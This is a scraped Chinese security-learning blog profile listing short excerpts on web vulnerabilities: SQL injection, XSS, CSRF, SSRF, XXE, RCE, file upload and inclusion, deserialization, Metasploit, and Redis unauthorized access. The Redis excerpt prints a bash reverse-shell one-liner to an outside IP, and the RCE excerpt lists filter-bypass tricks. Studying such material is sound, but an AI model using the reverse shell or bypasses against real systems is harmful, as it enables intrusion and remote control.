自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 收藏
  • 关注

原创 信息搜集与利用

通过关键特征,识别出目标的CMS系统、服务器、开发语言、操作系统、CDN、WAF的类别版本等等。1、CMS信息:比如Discuz、织梦、帝国CMS、PHPCMS、ECshop等;2、前端技术:比如HTML5、jquery、bootstrap、Vue、ace等;3、开发语言:比如PHP、Java、Ruby、Python、C#等;4、Web服务器:比如Apache、 Nginx、IIS、lighttpd等;5、应用服务器:比如Tomcat、Jboss、Weblogic、Websphere等;

2023-08-06 10:26:00 247

原创 逻辑漏洞的利用

拿到一个主页,第一个要试的就是弱口令,先简单尝试,不行的话就尝试密码爆破,如果有IP封锁的需要整个代理池进行随机的IP访问,有验证码的使用pkav工具辅助,登陆有token校验的使用多字段爆破,然后发现爆破点有加密的时候需要对payload进行加密处理,如果是多重加密的话就需要审计js代码从而知晓加密方式,然后写脚本进行payload处理爆破,这些都不行的话就试试如何获取到对方的cookie或session进行未授权的越权,也可以尝试使用目录扫描工具进行扫描然后找找有没有其他的页面可以尝试其他漏洞。

2023-08-06 10:07:32 183

原创 MSF测试工具说明

1 auxiliary:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等)2 exploits:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。3 payloads:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码4 post:后渗透阶段模块,漏洞利用成功获得meterpreter之后, 向目标发送的一些功能性指令,如:提权等。

2023-07-29 19:50:34 958 2

原创 密码的暴力破解

1、加密2、完整性3、身份认证(口令)

2023-07-28 10:11:14 218 1

原创 Redis未授权访问漏洞的利用

bash -i >& /dev/tcp/192.168.142.44/7777 0>&1:打开一个交互式的bash终端,与远程机器建立一个socket连接将标准错误输出合并到标准输出中,将标准输入重定向到标准输出中。启动Redis服务:/usr/local/soft/redis-6.0.9/src/redis-server /usr/local/soft/redis-6.0.9/redis.conf。进入客户端:/usr/local/soft/redis-6.0.9/src/redis-cli。

2023-07-26 20:38:27 233 1

原创 反序列化漏洞

类就是一个共享相同结构和行为的对象的集合。对象就是类的实例调用对象的方法魔术方法php手册:PHP: 魔术方法 - Manual调用方法的示例为什么设计魔术函数更加方便,比如需要在创建时做一些什么事情,销毁时做什么事情等等序列化:serialize反序列化:unserialize序列化代码示意序列化数据类型格式除了有serialize方法可以序列化,还有一些别的方式也可以进行序列化示例:在敏感信息不想被返回时,可以使用_sleep重写,重新定义返回值例子:反序列化反序列化的将序列化的值还原

2023-07-22 14:10:09 98

原创 CTF经验总结(持续更新)

1.2023巅峰极客

2023-07-22 13:50:27 197

原创 外部实体注入XXE漏洞

XML基础eXtensible Markup Language:可拓展标记语言XMLHTML:超文本传输语言,与html不同,HTML只能使用固定标签,而XXE可以使用自己定义的标签用途配置文件:层次分明结构清晰,自带校验,拓展方便交换数据,用来通信内容。

2023-07-22 09:04:22 53

原创 远程代码/命令执行RCE漏洞

less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符。远程命令执行Remote Command Execute相关函数。f***会匹配所有四个字母第一个字母是f的文件,比如。tac:从最后一行倒序显示内容,并将所有内容输出。代替目录分隔符/(本质是使用多个命令组合)cat:由第一行开始显示内容,并将所有内容输出。more:根据窗口大小,一页一页的现实文件内容。nl:类似于cat -n,显示时输出行号。或者%0a(回车符);{IFS}、${IFS}等来代替空格。Linux命令拼接符号。

2023-07-22 09:03:46 176

原创 服务器请求伪造SSRF漏洞

自我浅显理解:攻击者在能显示转到百度等界面的url里实现了访问其他网站,也可以探测端口,文件读取,反弹shell,内网渗透等,与xml或url跳转不同,该漏洞使用的是他人服务器的身份进行的请求伪造,url跳转是请求者的身份,XXE是引入了一个外部的实体,CSRF是有一个第三方的网站使用用户的身份请求伪造。比如某网页分享该网页的内容,有一个分享到的窗口,就必然解析加载其他网页社交网页的信息,分享到人人网微博等,就有加载该网页信息的功能,那么就可能存在SSRF漏洞。可能引起SSRF漏洞的相关函数php。

2023-07-22 09:02:23 59

原创 跨站脚本执行CSRF漏洞

nameid=1102&balance=1000 //这种链接就是向1102的用户转账100元),由于在登陆时网站保存了Cookie和session有效,所以第三方网站所有的请求本网站请求都是携带cookie和session,服务器认为是该账户的操作,导致该用户点击后在自己不知情的情况下以自己的身份将自己的钱转给了其他人。比如修改密码界面,可以使用输入原密码进行验证,还有其他操作接口界面可以使用短信验证码,手机扫描验证,人脸识别,图片验证,如谷歌浏览器内防止机器操作的人机识别;还有各种云产品可以检测。

2023-07-21 20:06:32 48 1

原创 网页脚本注入XSS漏洞

第一次登陆后服务端以set-cookie方式下发cookie,在登陆后的访问中都可以使用该cookie而不需要重复登陆,cookie里面有一些标志性信息,如什么时候过期(expires、max-age)后者优先生效,用户信息和对什么网页生效(path)等,在url上面锁的标志即可查看。个人愚见:就是每次都需要去进行代码注入,注入后才可以去执行,执行后下一次需要的时候再去注入,就是每一次都进行注入才能进行执行,所以叫做反射型。Cookie的问题:下发过多占用客户端过多的存储空间,增加通信成本。

2023-07-21 20:04:32 314 1

原创 文件上传漏洞

一句话木马只是webshell中的一种一句话木马特点代码短,只有一行代码。场景多,可以单独生成文件,也可以插入到图片中。安全性高,隐匿性强,可变形免杀小马特点能放文件的网站我们可以在木马中添加文件上传功能体积小,功能少只有文件上传功能大马特点体积大,功能全。能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。项目地址。

2023-07-21 19:57:23 162 1

原创 文件包含漏洞

file=php://input是一个特殊的输入流,可以用来读取请求主体的原始数据。它通常用于接收POST请求中的原始数据,而不是以表单数据的形式传递。URL参数名字出现了page、file、filename、include等等关键字。URL参数值出现了文件名,比如xxx.php xxx.html 等等。远程文件包含:Remote file inclusion:RFI。该类型是一个很好的可以处理文件包含漏洞的方式。禁用动态包含,使用静态包含固定包含文件。使用伪协议中的file协议即可绕过。

2023-07-21 19:55:13 58 1

原创 SQL注入漏洞

SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。

2023-07-21 19:53:12 571 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除